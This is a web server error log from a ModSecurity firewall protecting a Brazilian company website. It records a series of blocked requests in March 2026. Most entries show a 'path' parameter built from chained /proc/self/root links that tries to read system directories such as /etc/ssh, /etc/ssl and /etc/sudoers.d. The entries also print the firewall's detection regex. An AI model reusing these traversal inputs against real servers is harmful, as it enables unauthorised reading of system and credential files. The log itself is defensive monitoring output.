[Mon Mar 16 17:29:13.530194 2026] [:error] [pid 21806:tid 140411708356352] [client 74.7.241.46:50814] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhoGdSswJuvopo3lOh29wAAAIQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:29:14.843067 2026] [:error] [pid 10831:tid 140411565680384] [client 74.7.241.46:50816] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhoGo6lpbStxTqkSkuCIgAAAlU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:29:17.302553 2026] [:error] [pid 21805:tid 140411733534464] [client 74.7.241.46:50830] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhoHbABkC4fWIHEf8ENGAAAAEE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:29:55.954882 2026] [:error] [pid 10772:tid 140411691570944] [client 74.7.244.31:53394] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhoQ_9ocpUE4ed4uDwK_wAAAgY"]
[Mon Mar 16 17:30:36.957314 2026] [:error] [pid 29802:tid 140411599251200] [client 74.7.241.46:43300] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhobM_BxrYCr4hPDw8CkgAAAdE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:30:38.467946 2026] [:error] [pid 21806:tid 140411607643904] [client 74.7.241.46:49382] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhobtSswJuvopo3lOh3DwAAAJA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:30:41.835255 2026] [:error] [pid 10831:tid 140411599251200] [client 74.7.241.46:49396] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhocY6lpbStxTqkSkuCRwAAAlE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:31:46.413416 2026] [:error] [pid 15568:tid 140411699963648] [client 74.7.228.16:36942] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhosqQpVkWug9HeOt9NQQAAA0U"]
[Mon Mar 16 17:31:47.520526 2026] [:error] [pid 21805:tid 140411632822016] [client 74.7.241.46:49406] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhos7ABkC4fWIHEf8ENmwAAAE0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:32:42.809328 2026] [:error] [pid 29802:tid 140411582465792] [client 74.7.243.203:44942] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abho6s_BxrYCr4hPDw8CtwAAAdM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc
[Mon Mar 16 17:32:49.826470 2026] [:error] [pid 29802:tid 140411733534464] [client 74.7.243.203:35404] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abho8c_BxrYCr4hPDw8CwgAAAcE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:32:52.475505 2026] [:error] [pid 21805:tid 140411658000128] [client 74.7.243.203:47654] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abho9LABkC4fWIHEf8EN1QAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:32:53.966195 2026] [:error] [pid 21805:tid 140411632822016] [client 74.7.243.203:47664] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abho9bABkC4fWIHEf8EN1wAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:32:54.728422 2026] [:error] [pid 21806:tid 140411658000128] [client 74.7.241.46:45476] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abho9tSswJuvopo3lOh3WgAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:32:57.319489 2026] [:error] [pid 21806:tid 140411590858496] [client 74.7.243.203:47672] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abho-dSswJuvopo3lOh3XgAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:32:58.364591 2026] [:error] [pid 10651:tid 140411716749056] [client 74.7.241.46:49766] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abho-rysWC90G-1nBrBdCgAAAYM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:32:59.931991 2026] [:error] [pid 21805:tid 140411590858496] [client 74.7.243.203:47680] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abho-7ABkC4fWIHEf8EN4AAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:33:09.742624 2026] [:error] [pid 21805:tid 140411683178240] [client 74.7.243.203:38838] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpBbABkC4fWIHEf8EN8QAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:33:11.026968 2026] [:error] [pid 10772:tid 140411557287680] [client 74.7.243.203:43222] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpB_9ocpUE4ed4uDwLsQAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:33:12.247914 2026] [:error] [pid 10772:tid 140411590858496] [client 74.7.243.203:43230] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpCP9ocpUE4ed4uDwLtAAAAhI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:33:29.465960 2026] [:error] [pid 10772:tid 140411725141760] [client 74.7.241.46:51748] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpGf9ocpUE4ed4uDwLwgAAAgI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:33:41.783979 2026] [:error] [pid 29802:tid 140411574073088] [client 74.7.241.46:41250] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpJc_BxrYCr4hPDw8C2QAAAdQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:33:47.296205 2026] [:error] [pid 15061:tid 140411649607424] [client 74.7.241.46:47790] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpK6TCbgAP5jq5TehEogAAAss"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
